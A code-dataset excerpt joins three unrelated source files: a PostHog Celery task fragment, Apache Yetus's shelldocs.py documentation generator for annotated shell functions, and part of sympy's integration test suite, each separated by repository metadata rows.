@app.task(ignore_result=True)
def update_cache_item_task(key: str, cache_type, payload: dict) -> None:
from posthog.tasks.update_cache import update_cache_item
update_cache_item(key, cache_type, payload)
@app.task(ignore_result=True)
def send_weekly_email_report():
if settings.EMAIL_REPORTS_ENABLED:
from posthog.tasks.email import send_weekly_email_reports
send_weekly_email_reports()
@app.task(ignore_result=True, bind=True)
def debug_task(self):
print("Request: {0!r}".format(self.request))
@app.task(ignore_result=True)
def calculate_event_property_usage():
from posthog.tasks.calculate_event_property_usage import calculate_event_property_usage
calculate_event_property_usage()
@app.task(ignore_result=True)
def calculate_billing_daily_usage():
try:
from multi_tenancy.tasks import compute_daily_usage_for_organizations # noqa: F401
except ImportError:
pass
else:
compute_daily_usage_for_organizations()
| 33.857143 | 152 | 0.718057 |
db5c3ed492360b640a433a79ae54ee1783e3d091 | 14,471 | py | Python | shelldocs/shelldocs.py | lucaskanashiro/yetus | 27a1a998202b58184b369d8c92d2723019163839 | [
"Apache-2.0"
] | null | null | null | shelldocs/shelldocs.py | lucaskanashiro/yetus | 27a1a998202b58184b369d8c92d2723019163839 | [
"Apache-2.0"
] | 2 | 2021-09-27T23:07:24.000Z | 2022-02-26T05:38:49.000Z | shelldocs/shelldocs.py | lucaskanashiro/yetus | 27a1a998202b58184b369d8c92d2723019163839 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python -B
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
import sys
from optparse import OptionParser
ASFLICENSE = '''
<!---
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-->
'''
def docstrip(key, dstr):
'''remove extra spaces from shelldoc phrase'''
dstr = re.sub("^## @%s " % key, "", dstr)
dstr = dstr.lstrip()
dstr = dstr.rstrip()
return dstr
def toc(tlist):
'''build a table of contents'''
tocout = []
header = ()
for i in tlist:
if header != i.getinter():
header = i.getinter()
line = " * %s\n" % (i.headerbuild())
tocout.append(line)
line = " * [%s](#%s)\n" % (i.getname().replace("_", r"\_"),
i.getname())
tocout.append(line)
return tocout
class ShellFunction(object):
"""a shell function"""
def __init__(self, filename):
'''Initializer'''
self.name = None
self.audience = None
self.stability = None
self.replaceb = None
self.returnt = None
self.desc = None
self.params = None
self.filename = filename
self.linenum = 0
def __cmp__(self, other):
'''comparison'''
if self.audience == other.audience:
if self.stability == other.stability:
if self.replaceb == other.replaceb:
return cmp(self.name, other.name)
else:
if self.replaceb == "Yes":
return -1
else:
if self.stability == "Stable":
return -1
else:
if self.audience == "Public":
return -1
return 1
def reset(self):
'''empties current function'''
self.name = None
self.audience = None
self.stability = None
self.replaceb = None
self.returnt = None
self.desc = None
self.params = None
self.linenum = 0
self.filename = None
def getfilename(self):
'''get the name of the function'''
if self.filename is None:
return "undefined"
else:
return self.filename
def setname(self, text):
'''set the name of the function'''
definition = text.split()
self.name = definition[1]
def getname(self):
'''get the name of the function'''
if self.name is None:
return "None"
else:
return self.name
def setlinenum(self, linenum):
'''set the line number of the function'''
self.linenum = linenum
def getlinenum(self):
'''get the line number of the function'''
return self.linenum
def setaudience(self, text):
'''set the audience of the function'''
self.audience = docstrip("audience", text)
self.audience = self.audience.capitalize()
def getaudience(self):
'''get the audience of the function'''
if self.audience is None:
return "None"
else:
return self.audience
def setstability(self, text):
'''set the stability of the function'''
self.stability = docstrip("stability", text)
self.stability = self.stability.capitalize()
def getstability(self):
'''get the stability of the function'''
if self.stability is None:
return "None"
else:
return self.stability
def setreplace(self, text):
'''set the replacement state'''
self.replaceb = docstrip("replaceable", text)
self.replaceb = self.replaceb.capitalize()
def getreplace(self):
'''get the replacement state'''
if self.replaceb == "Yes":
return self.replaceb
else:
return "No"
def getinter(self):
'''get the function state'''
return self.getaudience(), self.getstability(), self.getreplace()
def addreturn(self, text):
'''add a return state'''
if self.returnt is None:
self.returnt = []
self.returnt.append(docstrip("return", text))
def getreturn(self):
'''get the complete return state'''
if self.returnt is None:
return "Nothing"
else:
return "\n\n".join(self.returnt)
def adddesc(self, text):
'''add to the description'''
if self.desc is None:
self.desc = []
self.desc.append(docstrip("description", text))
def getdesc(self):
'''get the description'''
if self.desc is None:
return "None"
else:
return " ".join(self.desc)
def addparam(self, text):
'''add a parameter'''
if self.params is None:
self.params = []
self.params.append(docstrip("param", text))
def getparams(self):
'''get all of the parameters'''
if self.params is None:
return ""
else:
return " ".join(self.params)
def getusage(self):
'''get the usage string'''
line = "%s %s" % (self.name, self.getparams())
return line.rstrip()
def headerbuild(self):
'''get the header for this function'''
if self.getreplace() == "Yes":
replacetext = "Replaceable"
else:
replacetext = "Not Replaceable"
line = "%s/%s/%s" % (self.getaudience(), self.getstability(),
replacetext)
return line
def getdocpage(self):
'''get the built document page for this function'''
line = "### `%s`\n\n"\
"* Synopsis\n\n"\
"```\n%s\n"\
"```\n\n" \
"* Description\n\n" \
"%s\n\n" \
"* Returns\n\n" \
"%s\n\n" \
"| Classification | Level |\n" \
"| :--- | :--- |\n" \
"| Audience | %s |\n" \
"| Stability | %s |\n" \
"| Replaceable | %s |\n\n" \
% (self.getname(),
self.getusage(),
self.getdesc(),
self.getreturn(),
self.getaudience(),
self.getstability(),
self.getreplace())
return line
def lint(self):
'''Lint this function'''
getfuncs = {
"audience": self.getaudience,
"stability": self.getstability,
"replaceable": self.getreplace,
}
validvalues = {
"audience": ("Public", "Private"),
"stability": ("Stable", "Evolving"),
"replaceable": ("Yes", "No"),
}
messages = []
for attr in ("audience", "stability", "replaceable"):
value = getfuncs[attr]()
if value == "None":
messages.append("%s:%u: ERROR: function %s has no @%s" %
(self.getfilename(), self.getlinenum(),
self.getname(), attr.lower()))
elif value not in validvalues[attr]:
validvalue = "|".join(v.lower() for v in validvalues[attr])
messages.append(
"%s:%u: ERROR: function %s has invalid value (%s) for @%s (%s)"
% (self.getfilename(), self.getlinenum(), self.getname(),
value.lower(), attr.lower(), validvalue))
return "\n".join(messages)
def __str__(self):
'''Generate a string for this function'''
line = "{%s %s %s %s}" \
% (self.getname(),
self.getaudience(),
self.getstability(),
self.getreplace())
return line
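# A hedged illustration (not taken from any real script) of the annotated shell
# function this tool consumes; the "## @..." prefixes are exactly the ones matched
# in main() below, and the function name is only an example:
#
#   ## @description  print a message to stderr
#   ## @audience     public
#   ## @stability    stable
#   ## @replaceable  no
#   ## @param        string
#   ## @return       0 always
#   function example_error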
def marked_as_ignored(file_path):
"""Checks for the presence of the marker(SHELLDOC-IGNORE) to ignore the file.
Marker needs to be in a line of its own and can not
be an inline comment.
A leading '#' and white-spaces(leading or trailing)
are trimmed before checking equality.
Comparison is case sensitive and the comment must be in
UPPERCASE.
"""
with open(file_path) as input_file:
for line_num, line in enumerate(input_file, 1):
if line.startswith("#") and line[1:].strip() == "SHELLDOC-IGNORE":
print >> sys.stderr, "Yo! Got an ignore directive in",\
"file:{} on line number:{}".format(file_path, line_num)
return True
return False
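# Illustrative example of the marker this check looks for: a shell script whose
# header contains the comment below on a line of its own would be skipped.
#
#   # SHELLDOC-IGNORE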
def main():
'''main entry point'''
parser = OptionParser(
usage="usage: %prog [--skipprnorep] " + "[--output OUTFILE|--lint] " +
"--input INFILE " + "[--input INFILE ...]",
epilog=
"You can mark a file to be ignored by shelldocs by adding"
" 'SHELLDOC-IGNORE' as comment in its own line."
)
parser.add_option("-o",
"--output",
dest="outfile",
action="store",
type="string",
help="file to create",
metavar="OUTFILE")
parser.add_option("-i",
"--input",
dest="infile",
action="append",
type="string",
help="file to read",
metavar="INFILE")
parser.add_option("--skipprnorep",
dest="skipprnorep",
action="store_true",
help="Skip Private & Not Replaceable")
parser.add_option("--lint",
dest="lint",
action="store_true",
help="Enable lint mode")
parser.add_option(
"-V",
"--version",
dest="release_version",
action="store_true",
default=False,
help="display version information for shelldocs and exit.")
(options, dummy_args) = parser.parse_args()
if options.release_version:
with open(
os.path.join(
os.path.dirname(__file__), "../VERSION"), 'r') as ver_file:
print ver_file.read()
sys.exit(0)
if options.infile is None:
parser.error("At least one input file needs to be supplied")
elif options.outfile is None and options.lint is None:
parser.error(
"At least one of output file and lint mode needs to be specified")
allfuncs = []
try:
for filename in options.infile:
with open(filename, "r") as shellcode:
# if the file contains a comment containing
# only "SHELLDOC-IGNORE" then skip that file
if marked_as_ignored(filename):
continue
funcdef = ShellFunction(filename)
linenum = 0
for line in shellcode:
linenum = linenum + 1
if line.startswith('## @description'):
funcdef.adddesc(line)
elif line.startswith('## @audience'):
funcdef.setaudience(line)
elif line.startswith('## @stability'):
funcdef.setstability(line)
elif line.startswith('## @replaceable'):
funcdef.setreplace(line)
elif line.startswith('## @param'):
funcdef.addparam(line)
elif line.startswith('## @return'):
funcdef.addreturn(line)
elif line.startswith('function'):
funcdef.setname(line)
funcdef.setlinenum(linenum)
if options.skipprnorep and \
funcdef.getaudience() == "Private" and \
funcdef.getreplace() == "No":
pass
else:
allfuncs.append(funcdef)
funcdef = ShellFunction(filename)
except IOError, err:
print >> sys.stderr, "ERROR: Failed to read from file: %s. Aborting." % err.filename
sys.exit(1)
allfuncs = sorted(allfuncs)
if options.lint:
for funcs in allfuncs:
message = funcs.lint()
if len(message) > 0:
print message
if options.outfile is not None:
with open(options.outfile, "w") as outfile:
outfile.write(ASFLICENSE)
for line in toc(allfuncs):
outfile.write(line)
outfile.write("\n------\n\n")
header = []
for funcs in allfuncs:
if header != funcs.getinter():
header = funcs.getinter()
line = "## %s\n" % (funcs.headerbuild())
outfile.write(line)
outfile.write(funcs.getdocpage())
if __name__ == "__main__":
main()
| 33.497685 | 92 | 0.526225 |
4b5765b499fd75b5845e0cc23fc09047bbae17f4 | 37,175 | py | Python | sympy/integrals/tests/test_integrals.py | pv/sympy | ee2374aa2de2d730aafa1fdefbdffe08b94041ff | [
"BSD-3-Clause"
] | 1 | 2016-02-13T15:46:16.000Z | 2016-02-13T15:46:16.000Z | sympy/integrals/tests/test_integrals.py | ojengwa/sympy | f90e7a8e4fd8fa9e7d6c6fecb4c7efe8f987ec60 | [
"BSD-3-Clause"
] | null | null | null | sympy/integrals/tests/test_integrals.py | ojengwa/sympy | f90e7a8e4fd8fa9e7d6c6fecb4c7efe8f987ec60 | [
"BSD-3-Clause"
] | null | null | null | from sympy import (
Abs, acos, acosh, Add, adjoint, asin, asinh, atan, Ci, conjugate, cos,
Derivative, diff, DiracDelta, E, exp, erf, erfi, EulerGamma, factor, Function,
Heaviside, I, Integral, integrate, Interval, Lambda, LambertW, log,
Matrix, O, oo, pi, Piecewise, Poly, Rational, S, simplify, sin, tan, sqrt,
sstr, Sum, Symbol, symbols, sympify, terms_gcd, transpose, trigsimp,
Tuple, nan, And, Eq, Or
)
from sympy.integrals.risch import NonElementaryIntegral
from sympy.utilities.pytest import XFAIL, raises, slow
from sympy.physics import units
x, y, a, t, x_1, x_2, z = symbols('x y a t x_1 x_2 z')
n = Symbol('n', integer=True)
f = Function('f')
def diff_test(i):
"""Return the set of symbols, s, which were used in testing that
i.diff(s) agrees with i.doit().diff(s). If there is an error then
the assertion will fail, causing the test to fail."""
syms = i.free_symbols
for s in syms:
assert (i.diff(s).doit() - i.doit().diff(s)).expand() == 0
return syms
def test_improper_integral():
assert integrate(log(x), (x, 0, 1)) == -1
assert integrate(x**(-2), (x, 1, oo)) == 1
def test_constructor():
# this is shared by Sum, so testing Integral's constructor
# is equivalent to testing Sum's
s1 = Integral(n, n)
assert s1.limits == (Tuple(n),)
s2 = Integral(n, (n,))
assert s2.limits == (Tuple(n),)
s3 = Integral(Sum(x, (x, 1, y)))
assert s3.limits == (Tuple(y),)
s4 = Integral(n, Tuple(n,))
assert s4.limits == (Tuple(n),)
s5 = Integral(n, (n, Interval(1, 2)))
assert s5.limits == (Tuple(n, 1, 2),)
def test_basics():
assert Integral(0, x) != 0
assert Integral(x, (x, 1, 1)) != 0
assert Integral(oo, x) != oo
assert Integral(S.NaN, x) == S.NaN
assert diff(Integral(y, y), x) == 0
assert diff(Integral(x, (x, 0, 1)), x) == 0
assert diff(Integral(x, x), x) == x
assert diff(Integral(t, (t, 0, x)), x) == x + Integral(0, (t, 0, x))
e = (t + 1)**2
assert diff(integrate(e, (t, 0, x)), x) == \
diff(Integral(e, (t, 0, x)), x).doit().expand() == \
((1 + x)**2).expand()
assert diff(integrate(e, (t, 0, x)), t) == \
diff(Integral(e, (t, 0, x)), t) == 0
assert diff(integrate(e, (t, 0, x)), a) == \
diff(Integral(e, (t, 0, x)), a) == 0
assert diff(integrate(e, t), a) == diff(Integral(e, t), a) == 0
assert integrate(e, (t, a, x)).diff(x) == \
Integral(e, (t, a, x)).diff(x).doit().expand()
assert Integral(e, (t, a, x)).diff(x).doit() == ((1 + x)**2)
assert integrate(e, (t, x, a)).diff(x).doit() == (-(1 + x)**2).expand()
assert integrate(t**2, (t, x, 2*x)).diff(x) == 7*x**2
assert Integral(x, x).atoms() == set([x])
assert Integral(f(x), (x, 0, 1)).atoms() == set([S(0), S(1), x])
assert diff_test(Integral(x, (x, 3*y))) == set([y])
assert diff_test(Integral(x, (a, 3*y))) == set([x, y])
# sum integral of terms
assert integrate(y + x + exp(x), x) == x*y + x**2/2 + exp(x)
assert Integral(x).is_commutative
n = Symbol('n', commutative=False)
assert Integral(n + x, x).is_commutative is False
def test_basics_multiple():
assert diff_test(Integral(x, (x, 3*x, 5*y), (y, x, 2*x))) == set([x])
assert diff_test(Integral(x, (x, 5*y), (y, x, 2*x))) == set([x])
assert diff_test(Integral(x, (x, 5*y), (y, y, 2*x))) == set([x, y])
assert diff_test(Integral(y, y, x)) == set([x, y])
assert diff_test(Integral(y*x, x, y)) == set([x, y])
assert diff_test(Integral(x + y, y, (y, 1, x))) == set([x])
assert diff_test(Integral(x + y, (x, x, y), (y, y, x))) == set([x, y])
def test_conjugate_transpose():
A, B = symbols("A B", commutative=False)
x = Symbol("x", complex=True)
p = Integral(A*B, (x,))
assert p.adjoint().doit() == p.doit().adjoint()
assert p.conjugate().doit() == p.doit().conjugate()
assert p.transpose().doit() == p.doit().transpose()
x = Symbol("x", real=True)
p = Integral(A*B, (x,))
assert p.adjoint().doit() == p.doit().adjoint()
assert p.conjugate().doit() == p.doit().conjugate()
assert p.transpose().doit() == p.doit().transpose()
def test_integration():
assert integrate(0, (t, 0, x)) == 0
assert integrate(3, (t, 0, x)) == 3*x
assert integrate(t, (t, 0, x)) == x**2/2
assert integrate(3*t, (t, 0, x)) == 3*x**2/2
assert integrate(3*t**2, (t, 0, x)) == x**3
assert integrate(1/t, (t, 1, x)) == log(x)
assert integrate(-1/t**2, (t, 1, x)) == 1/x - 1
assert integrate(t**2 + 5*t - 8, (t, 0, x)) == x**3/3 + 5*x**2/2 - 8*x
assert integrate(x**2, x) == x**3/3
assert integrate((3*t*x)**5, x) == (3*t)**5 * x**6 / 6
b = Symbol("b")
c = Symbol("c")
assert integrate(a*t, (t, 0, x)) == a*x**2/2
assert integrate(a*t**4, (t, 0, x)) == a*x**5/5
assert integrate(a*t**2 + b*t + c, (t, 0, x)) == a*x**3/3 + b*x**2/2 + c*x
def test_multiple_integration():
assert integrate((x**2)*(y**2), (x, 0, 1), (y, -1, 2)) == Rational(1)
assert integrate((y**2)*(x**2), x, y) == Rational(1, 9)*(x**3)*(y**3)
assert integrate(1/(x + 3)/(1 + x)**3, x) == \
-S(1)/8*log(3 + x) + S(1)/8*log(1 + x) + x/(4 + 8*x + 4*x**2)
def test_issue_3532():
assert integrate(exp(-x), (x, 0, oo)) == 1
def test_issue_3560():
assert integrate(sqrt(x)**3, x) == 2*sqrt(x)**5/5
assert integrate(sqrt(x), x) == 2*sqrt(x)**3/3
assert integrate(1/sqrt(x)**3, x) == -2/sqrt(x)
def test_integrate_poly():
p = Poly(x + x**2*y + y**3, x, y)
qx = integrate(p, x)
qy = integrate(p, y)
assert isinstance(qx, Poly) is True
assert isinstance(qy, Poly) is True
assert qx.gens == (x, y)
assert qy.gens == (x, y)
assert qx.as_expr() == x**2/2 + x**3*y/3 + x*y**3
assert qy.as_expr() == x*y + x**2*y**2/2 + y**4/4
def test_integrate_poly_defined():
p = Poly(x + x**2*y + y**3, x, y)
Qx = integrate(p, (x, 0, 1))
Qy = integrate(p, (y, 0, pi))
assert isinstance(Qx, Poly) is True
assert isinstance(Qy, Poly) is True
assert Qx.gens == (y,)
assert Qy.gens == (x,)
assert Qx.as_expr() == Rational(1, 2) + y/3 + y**3
assert Qy.as_expr() == pi**4/4 + pi*x + pi**2*x**2/2
def test_integrate_omit_var():
y = Symbol('y')
assert integrate(x) == x**2/2
raises(ValueError, lambda: integrate(2))
raises(ValueError, lambda: integrate(x*y))
def test_integrate_poly_accurately():
y = Symbol('y')
assert integrate(x*sin(y), x) == x**2*sin(y)/2
# when passed to risch_norman, this will be a CPU hog, so this really
    # checks that the integrated function is recognized as a polynomial
assert integrate(x**1000*sin(y), x) == x**1001*sin(y)/1001
def test_issue_3635():
y = Symbol('y')
assert integrate(x**2, y) == x**2*y
assert integrate(x**2, (y, -1, 1)) == 2*x**2
# works in sympy and py.test but hangs in `setup.py test`
def test_integrate_linearterm_pow():
# check integrate((a*x+b)^c, x) -- issue 3499
y = Symbol('y', positive=True)
# TODO: Remove conds='none' below, let the assumption take care of it.
assert integrate(x**y, x, conds='none') == x**(y + 1)/(y + 1)
assert integrate((exp(y)*x + 1/y)**(1 + sin(y)), x, conds='none') == \
exp(-y)*(exp(y)*x + 1/y)**(2 + sin(y)) / (2 + sin(y))
def test_issue_3618():
assert integrate(pi*sqrt(x), x) == 2*pi*sqrt(x)**3/3
assert integrate(pi*sqrt(x) + E*sqrt(x)**3, x) == \
2*pi*sqrt(x)**3/3 + 2*E *sqrt(x)**5/5
def test_issue_3623():
assert integrate(cos((n + 1)*x), x) == Piecewise(
(x, Eq(n + 1, 0)), (sin((n + 1)*x)/(n + 1), True))
assert integrate(cos((n - 1)*x), x) == Piecewise(
(x, Eq(n - 1, 0)), (sin((n - 1)*x)/(n - 1), True))
assert integrate(cos((n + 1)*x) + cos((n - 1)*x), x) == \
Piecewise((x, Eq(n + 1, 0)), (sin((n + 1)*x)/(n + 1), True)) + \
Piecewise((x, Eq(n - 1, 0)), (sin((n - 1)*x)/(n - 1), True))
def test_issue_3664():
n = Symbol('n', integer=True, nonzero=True)
assert integrate(-1./2 * x * sin(n * pi * x/2), [x, -2, 0]) == \
2*cos(pi*n)/(pi*n)
assert integrate(-Rational(1)/2 * x * sin(n * pi * x/2), [x, -2, 0]) == \
2*cos(pi*n)/(pi*n)
def test_issue_3679():
# definite integration of rational functions gives wrong answers
assert NS(Integral(1/(x**2 - 8*x + 17), (x, 2, 4))) == '1.10714871779409'
def test_issue_3686(): # remove this when fresnel integrals are implemented
from sympy import expand_func, fresnels
assert expand_func(integrate(sin(x**2), x)) == \
sqrt(2)*sqrt(pi)*fresnels(sqrt(2)*x/sqrt(pi))/2
def test_integrate_units():
m = units.m
s = units.s
assert integrate(x * m/s, (x, 1*s, 5*s)) == 12*m*s
def test_transcendental_functions():
assert integrate(LambertW(2*x), x) == \
-x + x*LambertW(2*x) + x/LambertW(2*x)
def test_issue_3740():
f = 4*log(x) - 2*log(x)**2
fid = diff(integrate(f, x), x)
assert abs(f.subs(x, 42).evalf() - fid.subs(x, 42).evalf()) < 1e-10
def test_issue_3788():
assert integrate(1/(1 + x**2), x) == atan(x)
def test_issue_3952():
f = sin(x)
assert integrate(f, x) == -cos(x)
raises(ValueError, lambda: integrate(f, 2*x))
def test_issue_4516():
assert integrate(2**x - 2*x, x) == 2**x/log(2) - x**2
def test_matrices():
M = Matrix(2, 2, lambda i, j: (i + j + 1)*sin((i + j + 1)*x))
assert integrate(M, x) == Matrix([
[-cos(x), -cos(2*x)],
[-cos(2*x), -cos(3*x)],
])
# issue1012
def test_integrate_functions():
assert integrate(f(x), x) == Integral(f(x), x)
assert integrate(f(x), (x, 0, 1)) == Integral(f(x), (x, 0, 1))
assert integrate(f(x)*diff(f(x), x), x) == f(x)**2/2
assert integrate(diff(f(x), x) / f(x), x) == log(f(x))
def test_integrate_derivatives():
assert integrate(Derivative(f(x), x), x) == f(x)
assert integrate(Derivative(f(y), y), x) == x*Derivative(f(y), y)
def test_transform():
a = Integral(x**2 + 1, (x, -1, 2))
fx = x
fy = 3*y + 1
assert a.doit() == a.transform(fx, fy).doit()
assert a.transform(fx, fy).transform(fy, fx) == a
fx = 3*x + 1
fy = y
assert a.transform(fx, fy).transform(fy, fx) == a
a = Integral(sin(1/x), (x, 0, 1))
assert a.transform(x, 1/y) == Integral(sin(y)/y**2, (y, 1, oo))
assert a.transform(x, 1/y).transform(y, 1/x) == a
a = Integral(exp(-x**2), (x, -oo, oo))
assert a.transform(x, 2*y) == Integral(2*exp(-4*y**2), (y, -oo, oo))
# < 3 arg limit handled properly
assert Integral(x, x).transform(x, a*y).doit() == \
Integral(y*a**2, y).doit()
_3 = S(3)
assert Integral(x, (x, 0, -_3)).transform(x, 1/y).doit() == \
Integral(-1/x**3, (x, -oo, -1/_3)).doit()
assert Integral(x, (x, 0, _3)).transform(x, 1/y) == \
Integral(y**(-3), (y, 1/_3, oo))
def test_issue_4052():
f = S(1)/2*asin(x) + x*sqrt(1 - x**2)/2
assert integrate(cos(asin(x)), x) == f
assert integrate(sin(acos(x)), x) == f
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
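# NS is a small numeric-evaluation helper used throughout the tests below: it
# evaluates an expression to n significant digits and returns the string form,
# e.g. NS(pi, 5) should give a string like '3.1416' (illustrative value).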
def test_evalf_integrals():
assert NS(Integral(x, (x, 2, 5)), 15) == '10.5000000000000'
gauss = Integral(exp(-x**2), (x, -oo, oo))
assert NS(gauss, 15) == '1.77245385090552'
assert NS(gauss**2 - pi + E*Rational(
1, 10**20), 15) in ('2.71828182845904e-20', '2.71828182845905e-20')
# A monster of an integral from http://mathworld.wolfram.com/DefiniteIntegral.html
t = Symbol('t')
a = 8*sqrt(3)/(1 + 3*t**2)
b = 16*sqrt(2)*(3*t + 1)*sqrt(4*t**2 + t + 1)**3
c = (3*t**2 + 1)*(11*t**2 + 2*t + 3)**2
d = sqrt(2)*(249*t**2 + 54*t + 65)/(11*t**2 + 2*t + 3)**2
f = a - b/c - d
assert NS(Integral(f, (t, 0, 1)), 50) == \
NS((3*sqrt(2) - 49*pi + 162*atan(sqrt(2)))/12, 50)
# http://mathworld.wolfram.com/VardisIntegral.html
assert NS(Integral(log(log(1/x))/(1 + x + x**2), (x, 0, 1)), 15) == \
NS('pi/sqrt(3) * log(2*pi**(5/6) / gamma(1/6))', 15)
# http://mathworld.wolfram.com/AhmedsIntegral.html
assert NS(Integral(atan(sqrt(x**2 + 2))/(sqrt(x**2 + 2)*(x**2 + 1)), (x,
0, 1)), 15) == NS(5*pi**2/96, 15)
# http://mathworld.wolfram.com/AbelsIntegral.html
assert NS(Integral(x/((exp(pi*x) - exp(
-pi*x))*(x**2 + 1)), (x, 0, oo)), 15) == NS('log(2)/2-1/4', 15)
# Complex part trimming
# http://mathworld.wolfram.com/VardisIntegral.html
assert NS(Integral(log(log(sin(x)/cos(x))), (x, pi/4, pi/2)), 15, chop=True) == \
NS('pi/4*log(4*pi**3/gamma(1/4)**4)', 15)
#
# Endpoints causing trouble (rounding error in integration points -> complex log)
assert NS(
2 + Integral(log(2*cos(x/2)), (x, -pi, pi)), 17, chop=True) == NS(2, 17)
assert NS(
2 + Integral(log(2*cos(x/2)), (x, -pi, pi)), 20, chop=True) == NS(2, 20)
assert NS(
2 + Integral(log(2*cos(x/2)), (x, -pi, pi)), 22, chop=True) == NS(2, 22)
# Needs zero handling
assert NS(pi - 4*Integral(
'sqrt(1-x**2)', (x, 0, 1)), 15, maxn=30, chop=True) in ('0.0', '0')
# Oscillatory quadrature
a = Integral(sin(x)/x**2, (x, 1, oo)).evalf(maxn=15)
assert 0.49 < a < 0.51
assert NS(
Integral(sin(x)/x**2, (x, 1, oo)), quad='osc') == '0.504067061906928'
assert NS(Integral(
cos(pi*x + 1)/x, (x, -oo, -1)), quad='osc') == '0.276374705640365'
# indefinite integrals aren't evaluated
assert NS(Integral(x, x)) == 'Integral(x, x)'
assert NS(Integral(x, (x, y))) == 'Integral(x, (x, y))'
def test_evalf_issue_939():
# https://github.com/sympy/sympy/issues/4038
# The output form of an integral may differ by a step function between
# revisions, making this test a bit useless. This can't be said about
# other two tests. For now, all values of this evaluation are used here,
# but in future this should be reconsidered.
assert NS(integrate(1/(x**5 + 1), x).subs(x, 4), chop=True) in \
['-0.000976138910649103', '0.965906660135753', '1.93278945918216']
assert NS(Integral(1/(x**5 + 1), (x, 2, 4))) == '0.0144361088886740'
assert NS(
integrate(1/(x**5 + 1), (x, 2, 4)), chop=True) == '0.0144361088886740'
@XFAIL
def test_failing_integrals():
#---
# Double integrals not implemented
assert NS(Integral(
sqrt(x) + x*y, (x, 1, 2), (y, -1, 1)), 15) == '2.43790283299492'
# double integral + zero detection
assert NS(Integral(sin(x + x*y), (x, -1, 1), (y, -1, 1)), 15) == '0.0'
def test_integrate_DiracDelta():
# This is here to check that deltaintegrate is being called, but also
# to test definite integrals. More tests are in test_deltafunctions.py
assert integrate(DiracDelta(x) * f(x), (x, -oo, oo)) == f(0)
assert integrate(DiracDelta(x) * f(x), (x, 0, oo)) == f(0)/2
assert integrate(DiracDelta(x)**2, (x, -oo, oo)) == DiracDelta(0)
# issue 4522
assert integrate(integrate((4 - 4*x + x*y - 4*y) * \
DiracDelta(x)*DiracDelta(y - 1), (x, 0, 1)), (y, 0, 1)) == 0
# issue 5729
p = exp(-(x**2 + y**2))/pi
assert integrate(p*DiracDelta(x - 10*y), (x, -oo, oo), (y, -oo, oo)) == \
integrate(p*DiracDelta(x - 10*y), (y, -oo, oo), (x, -oo, oo)) == \
integrate(p*DiracDelta(10*x - y), (x, -oo, oo), (y, -oo, oo)) == \
integrate(p*DiracDelta(10*x - y), (y, -oo, oo), (x, -oo, oo)) == \
1/sqrt(101*pi)
@XFAIL
def test_integrate_DiracDelta_fails():
# issue 6427
assert integrate(integrate(integrate(
DiracDelta(x - y - z), (z, 0, oo)), (y, 0, 1)), (x, 0, 1)) == S(1)/2
def test_integrate_returns_piecewise():
assert integrate(x**y, x) == Piecewise(
(log(x), Eq(y, -1)), (x**(y + 1)/(y + 1), True))
assert integrate(x**y, y) == Piecewise(
(y, Eq(log(x), 0)), (x**y/log(x), True))
assert integrate(exp(n*x), x) == Piecewise(
(x, Eq(n, 0)), (exp(n*x)/n, True))
assert integrate(x*exp(n*x), x) == Piecewise(
(x**2/2, Eq(n**3, 0)), ((x*n**2 - n)*exp(n*x)/n**3, True))
assert integrate(x**(n*y), x) == Piecewise(
(log(x), Eq(n*y, -1)), (x**(n*y + 1)/(n*y + 1), True))
assert integrate(x**(n*y), y) == Piecewise(
(y, Eq(n*log(x), 0)), (x**(n*y)/(n*log(x)), True))
assert integrate(cos(n*x), x) == Piecewise(
(x, Eq(n, 0)), (sin(n*x)/n, True))
assert integrate(cos(n*x)**2, x) == Piecewise(
(x, Eq(n, 0)), ((n*x/2 + sin(n*x)*cos(n*x)/2)/n, True))
assert integrate(x*cos(n*x), x) == Piecewise(
(x**2/2, Eq(n, 0)), (x*sin(n*x)/n + cos(n*x)/n**2, True))
assert integrate(sin(n*x), x) == Piecewise(
(0, Eq(n, 0)), (-cos(n*x)/n, True))
assert integrate(sin(n*x)**2, x) == Piecewise(
(0, Eq(n, 0)), ((n*x/2 - sin(n*x)*cos(n*x)/2)/n, True))
assert integrate(x*sin(n*x), x) == Piecewise(
(0, Eq(n, 0)), (-x*cos(n*x)/n + sin(n*x)/n**2, True))
assert integrate(exp(x*y),(x,0,z)) == Piecewise( \
(z, Eq(y,0)), (exp(y*z)/y - 1/y, True))
def test_subs1():
e = Integral(exp(x - y), x)
assert e.subs(y, 3) == Integral(exp(x - 3), x)
e = Integral(exp(x - y), (x, 0, 1))
assert e.subs(y, 3) == Integral(exp(x - 3), (x, 0, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(x - y)*f(y), (y, -oo, oo))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo))
def test_subs2():
e = Integral(exp(x - y), x, t)
assert e.subs(y, 3) == Integral(exp(x - 3), x, t)
e = Integral(exp(x - y), (x, 0, 1), (t, 0, 1))
assert e.subs(y, 3) == Integral(exp(x - 3), (x, 0, 1), (t, 0, 1))
f = Lambda(x, exp(-x**2))
conv = Integral(f(x - y)*f(y), (y, -oo, oo), (t, 0, 1))
assert conv.subs({x: 0}) == Integral(exp(-2*y**2), (y, -oo, oo), (t, 0, 1))
def test_subs3():
e = Integral(exp(x - y), (x, 0, y), (t, y, 1))
assert e.subs(y, 3) == Integral(exp(x - 3), (x, 0, 3), (t, 3, 1))
f = Lambda(x, exp(-x**2))
